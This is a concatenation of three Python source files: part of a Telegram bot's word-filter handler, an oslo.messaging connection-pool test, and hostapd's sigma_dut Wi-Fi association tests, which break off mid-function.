        try:
            ress = res.split(None, 2)
            if ress[1] == "reply":
                ftype = 1
            elif ress[1] == "replydel":
                ftype = 1
                delete = 1
            elif ress[1] == "warn":
                ftype = 2
            elif ress[1] == "warndel":
                ftype = 2
                delete = 1
            else:
                return
            word = ress[0]
            response = ress[2]
        except IndexError:
            # No response text was given after the filter type.
            if ftype == 2:
                self.msg.reply_text("Give a response message for warn.")
                return
            # Bare word: default to a delete-only filter.
            word = res
            delete = 1
        chat_id = self.chat_id
        # Replace any existing filter for the same word.
        filter_list = self.db.get_filter(chat_id)
        for i in filter_list:
            if word == i[2]:
                self.filter_remove(word)
                break
        self.db.add_filter(chat_id=chat_id, word=word, type=ftype, response=response, delete=delete)
        self.msg.reply_text(word + " added to filter!")
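    # Accepted /filteradd payload shapes handled by filter_add (illustrative):
    #   "beep"                       -> delete-only filter (ftype 0, delete 1)
    #   "beep reply be polite"       -> reply with "be polite" (ftype 1)
    #   "beep warndel no profanity"  -> warn and delete (ftype 2, delete 1)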
    def filter_stat(self, res):
        m = extract.sudo_check_2(msg=self.msg, del_lvl=1, context=self.context)
        if m == 0:
            return
        if res == "on":
            self.db.add_settings(self.chat_id, filter=1)
            self.msg.reply_text("Chat filter active!")
        elif res == "off":
            self.db.add_settings(self.chat_id, filter=0)
            self.msg.reply_text("Chat filter deactivated!")
        elif res == "list":
            fi_li = self.db.get_filter(self.chat_id)
            self.msg.reply_text(fi_li)
        else:
            # "stat" (or any other argument): report status and filter count.
            count = len(self.db.get_filter(self.chat_id))
            settings = self.db.get_settings(self.chat_id)
            state = "active" if settings[5] != 0 else "off"
            self.msg.reply_text("Filter currently " + state + " with " + str(count)
                                + " active filters in this chat.")
    def router(self):
        res = self.msg_string.split(None, 1)
        if res[0] == "/lock":
            self.lock()
        elif res[0] == "/unlock":
            self.unlock()
        elif res[0] == "/filter":
            try:
                self.filter_stat(res[1])
            except IndexError:
                # No argument given: fall back to a status report.
                self.filter_stat("stat")
        elif res[0] == "/filteradd":
            m = extract.sudo_check_2(msg=self.msg, del_lvl=1, context=self.context)
            if m == 0:
                return
            try:
                self.filter_add(res[1])
            except IndexError:
                ex = ("Please use this format:\n'/filteradd <word> <filter-type> <reason/reply-text>'\n\n"
                      "<word> is the text that the bot has to react to\n"
                      "<filter-type> is the type of filter; it can be any of ('warn', 'reply', 'warndel', 'replydel'), or omitted to simply delete the message\n"
                      "<reason/reply-text> is the text the bot responds with for reply & warn\n\n"
                      "Ex: '/filteradd beep warndel for using profane words'")
                self.msg.reply_text(ex)
        elif res[0] == "/filterdel":
            self.filter_remove(res[1], 1)
def filter_router(update, context):
    # Handle each update on a daemon thread so the dispatcher is not blocked.
    threading.Thread(target=filter_switch(update, context).router, args=(), daemon=True).start()
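# Hedged wiring sketch (not part of this module): filter_router has the shape
# of a context-based python-telegram-bot callback and would typically be
# registered along the lines of
#   dispatcher.add_handler(MessageHandler(Filters.text | Filters.command, filter_router))
# MessageHandler/Filters are python-telegram-bot (v12/v13) names; how this
# project actually registers the handler is an assumption.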
|
test_pool.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import uuid
import testscenarios
from oslo_messaging._drivers import pool
from oslo_messaging.tests import utils as test_utils
load_tests = testscenarios.load_tests_apply_scenarios
class PoolTestCase(test_utils.BaseTestCase):
_max_size = [
('default_size', dict(max_size=None, n_iters=4)),
('set_max_size', dict(max_size=10, n_iters=10)),
]
_create_error = [
('no_create_error', dict(create_error=False)),
('create_error', dict(create_error=True)),
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._max_size,
cls._create_error)
class TestPool(pool.Pool):
def create(self):
return uuid.uuid4()
class ThreadWaitWaiter(object):
"""A gross hack.
Stub out the condition variable's wait() method and spin until it
has been called by each thread.
"""
def __init__(self, cond, n_threads, stubs):
self.cond = cond
self.stubs = stubs
self.n_threads = n_threads
self.n_waits = 0
self.orig_wait = cond.wait
def count_waits(**kwargs):
self.n_waits += 1
self.orig_wait(**kwargs)
self.stubs.Set(self.cond, 'wait', count_waits)
def wait(self):
while self.n_waits < self.n_threads:
pass
self.stubs.Set(self.cond, 'wait', self.orig_wait)
def test_pool(self):
kwargs = {}
if self.max_size is not None:
kwargs['max_size'] = self.max_size
p = self.TestPool(**kwargs)
if self.create_error:
def create_error():
raise RuntimeError
orig_create = p.create
self.stubs.Set(p, 'create', create_error)
self.assertRaises(RuntimeError, p.get)
self.stubs.Set(p, 'create', orig_create)
objs = []
for i in range(self.n_iters):
objs.append(p.get())
self.assertIsInstance(objs[i], uuid.UUID)
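        # The pool is now exhausted: each further get() must block on the
        # pool's condition variable until an object is put() back.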
def wait_for_obj():
o = p.get()
self.assertIn(o, objs)
waiter = self.ThreadWaitWaiter(p._cond, self.n_iters, self.stubs)
threads = []
for i in range(self.n_iters):
t = threading.Thread(target=wait_for_obj)
t.start()
threads.append(t)
waiter.wait()
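        # Every worker is now parked in cond.wait(); returning the objects
        # wakes them up so wait_for_obj() can complete.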
for o in objs:
p.put(o)
for t in threads:
t.join()
for o in objs:
p.put(o)
for o in p.iter_free():
self.assertIn(o, objs)
objs.remove(o)
self.assertEqual([], objs)
PoolTestCase.generate_scenarios()
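# multiply_scenarios() crosses the two lists above, so every test method in
# PoolTestCase runs four times: {default,set} max_size x {no_,}create_error.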
|
test_sigma_dut.py
|
# Test cases for sigma_dut
# Copyright (c) 2017, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import logging
logger = logging.getLogger()
import os
import socket
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip
from hwsim import HWSimRadio
import hwsim_utils
from test_dpp import check_dpp_capab, update_hapd_config
from test_suite_b import check_suite_b_192_capa, suite_b_as_params, suite_b_192_rsa_ap_params
from test_ap_eap import check_eap_capa
from test_ap_hs20 import hs20_ap_params
def check_sigma_dut():
if not os.path.exists("./sigma_dut"):
raise HwsimSkip("sigma_dut not available")
def sigma_dut_cmd(cmd, port=9000, timeout=2):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.settimeout(timeout)
addr = ('127.0.0.1', port)
sock.connect(addr)
sock.send(cmd + "\r\n")
try:
res = sock.recv(1000)
running = False
done = False
for line in res.splitlines():
if line.startswith("status,RUNNING"):
running = True
elif line.startswith("status,INVALID"):
done = True
elif line.startswith("status,ERROR"):
done = True
elif line.startswith("status,COMPLETE"):
done = True
        if running and not done:
            # The first recv() only returned "status,RUNNING"; read the
            # actual final response.
            res = sock.recv(1000)
    except Exception:
        res = ''
sock.close()
res = res.rstrip()
logger.debug("sigma_dut: '%s' --> '%s'" % (cmd, res))
return res
def sigma_dut_cmd_check(cmd, port=9000, timeout=2):
res = sigma_dut_cmd(cmd, port=port, timeout=timeout)
if "COMPLETE" not in res:
raise Exception("sigma_dut command failed: " + cmd)
return res
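# Hedged usage sketch (the helper name is ours, never invoked by the tests):
# the Sigma control protocol can answer in two phases, first "status,RUNNING"
# and then the final "status,COMPLETE,..." line, which is why sigma_dut_cmd()
# above may issue a second recv().  A minimal round trip, assuming a sigma_dut
# instance is listening on the default port:
def _example_sigma_dut_exchange():
    res = sigma_dut_cmd("ca_get_version")
    # Expected final response: "status,COMPLETE,version,1.0"
    return "COMPLETE" in res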
def start_sigma_dut(ifname, debug=False, hostapd_logdir=None, cert_path=None,
bridge=None):
check_sigma_dut()
cmd = [ './sigma_dut',
'-M', ifname,
'-S', ifname,
'-F', '../../hostapd/hostapd',
'-G',
'-w', '/var/run/wpa_supplicant/',
'-j', ifname ]
if debug:
cmd += [ '-d' ]
if hostapd_logdir:
cmd += [ '-H', hostapd_logdir ]
if cert_path:
cmd += [ '-C', cert_path ]
if bridge:
cmd += [ '-b', bridge ]
sigma = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
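    # sigma_dut may need a moment to open its control socket; poll with HELLO
    # (up to 20 tries, ~1 s total) before handing the process back.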
    for _ in range(20):
        try:
            sigma_dut_cmd("HELLO")
            break
        except Exception:
            time.sleep(0.05)
return sigma
def stop_sigma_dut(sigma):
sigma.terminate()
sigma.wait()
out, err = sigma.communicate()
logger.debug("sigma_dut stdout: " + str(out))
logger.debug("sigma_dut stderr: " + str(err))
def sigma_dut_wait_connected(ifname):
    for _ in range(50):
        res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
        if "connected,1" in res:
            break
        time.sleep(0.2)
    else:
        # No break: the STA never reported connected,1 within ~10 seconds.
        raise Exception("Connection did not complete")
def test_sigma_dut_basic(dev, apdev):
"""sigma_dut basic functionality"""
sigma = start_sigma_dut(dev[0].ifname)
res = sigma_dut_cmd("UNKNOWN")
if "status,INVALID,errorCode,Unknown command" not in res:
raise Exception("Unexpected sigma_dut response to unknown command")
tests = [ ("ca_get_version", "status,COMPLETE,version,1.0"),
("device_get_info", "status,COMPLETE,vendor"),
("device_list_interfaces,interfaceType,foo", "status,ERROR"),
("device_list_interfaces,interfaceType,802.11",
"status,COMPLETE,interfaceType,802.11,interfaceID," + dev[0].ifname) ]
for cmd, response in tests:
res = sigma_dut_cmd(cmd)
if response not in res:
raise Exception("Unexpected %s response: %s" % (cmd, res))
stop_sigma_dut(sigma)
def test_sigma_dut_open(dev, apdev):
"""sigma_dut controlled open network association"""
try:
run_sigma_dut_open(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_open(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
hapd = hostapd.add_ap(apdev[0], { "ssid": "open" })
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_encryption,interface,%s,ssid,%s,encpType,none" % (ifname, "open"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "open"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf(dev, apdev):
"""sigma_dut controlled PSK+PMF association"""
try:
run_sigma_dut_psk_pmf(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_psk_pmf(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "test-pmf-required", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf_bip_cmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-128"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-128", "AES-128-CMAC")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_cmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-256"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-256", "BIP-CMAC-256")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_gmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-128"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-128", "BIP-GMAC-128")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_gmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "BIP-GMAC-256")
finally:
dev[0].set("ignore_old_scan_res", "0")
def test_sigma_dut_psk_pmf_bip_gmac_256_mismatch(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256 mismatch"""
try:
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "AES-128-CMAC",
failure=True)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_psk_pmf_cipher(dev, apdev, sigma_cipher, hostapd_cipher,
failure=False):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params["group_mgmt_cipher"] = hostapd_cipher
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,GroupMgntCipher,%s" % (ifname, "test-pmf-required", "12345678", sigma_cipher))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"))
if failure:
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Connection reported")
else:
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_sae(dev, apdev):
"""sigma_dut controlled SAE association"""
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,20" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_sae_password(dev, apdev):
"""sigma_dut controlled SAE association and long password"""
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['sae_password'] = 100*'B'
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", 100*'B'))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_override_rsne(dev, apdev):
"""sigma_dut and RSNE override on STA"""
try:
run_sigma_dut_sta_override_rsne(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_sta_override_rsne(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
ssid = "test-psk"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
tests = [ "30120100000fac040100000fac040100000fac02",
"30140100000fac040100000fac040100000fac02ffff" ]
for test in tests:
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,%s" % (ifname, test))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,300101" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"))
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"])
if ev is None:
raise Exception("Association rejection not reported")
if "status_code=40" not in ev:
raise Exception("Unexpected status code: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk(dev, apdev):
"""sigma_dut controlled AP"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_pskhex(dev, apdev, params):
"""sigma_dut controlled AP and PSKHEX"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_pskhex.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
psk = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSKHEX," + psk)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", raw_psk=psk, scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sha256(dev, apdev, params):
"""sigma_dut controlled AP PSK SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-256,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b(dev, apdev, params):
"""sigma_dut controlled STA Suite B"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/ec2-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca.pem"), "w") as f2:
f2.write(f.read())
with open("auth_serv/ec2-user.pem", "r") as f:
with open("auth_serv/ec2-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
params = { "ssid": "test-suite-b",
"wpa": "2",
"wpa_key_mgmt": "WPA-EAP-SUITE-B-192",
"rsn_pairwise": "GCMP-256",
"group_mgmt_cipher": "BIP-GMAC-256",
"ieee80211w": "2",
"ieee8021x": "1",
'auth_server_addr': "127.0.0.1",
'auth_server_port': "18129",
'auth_server_shared_secret': "radius",
'nas_identifier': "nas.w1.fi" }
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b.pem,trustedRootCA,suite_b_ca.pem,CertType,ECC" % (ifname, "test-suite-b"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b_rsa(dev, apdev, params):
"""sigma_dut controlled STA Suite B (RSA)"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/rsa3072-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca_rsa.pem"), "w") as f2:
f2.write(f.read())
with open("auth_serv/rsa3072-user.pem", "r") as f:
with open("auth_serv/rsa3072-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b_rsa.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_192_rsa_ap_params()
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
cmd = "sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b_rsa.pem,trustedRootCA,suite_b_ca_rsa.pem,CertType,RSA" % (ifname, "test-suite-b")
tests = [ "",
",TLSCipher,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
",TLSCipher,TLS_DHE_RSA_WITH_AES_256_GCM_SHA384" ]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_ap_suite_b(dev, apdev, params):
"""sigma_dut controlled AP Suite B"""
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_suite_b.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SuiteB")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
pairwise="GCMP-256", group="GCMP-256",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_cipher_gcmp_128(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-128/BIP-GMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-128", "BIP-GMAC-128",
"GCMP")
def test_sigma_dut_ap_cipher_gcmp_256(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256")
def test_sigma_dut_ap_cipher_ccmp_128(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128/BIP-CMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128", "BIP-CMAC-128",
"CCMP")
def test_sigma_dut_ap_cipher_ccmp_256(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-256/BIP-CMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-256", "BIP-CMAC-256",
"CCMP-256")
def test_sigma_dut_ap_cipher_ccmp_gcmp_1(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (1)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "CCMP")
def test_sigma_dut_ap_cipher_ccmp_gcmp_2(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (2)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "GCMP-256", "CCMP")
def test_sigma_dut_ap_cipher_gcmp_256_group_ccmp(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/CCMP/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256", "CCMP", "AES-CCMP-128")
def run_sigma_dut_ap_cipher(dev, apdev, params, ap_pairwise, ap_group_mgmt,
sta_cipher, sta_cipher_group=None, ap_group=None):
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
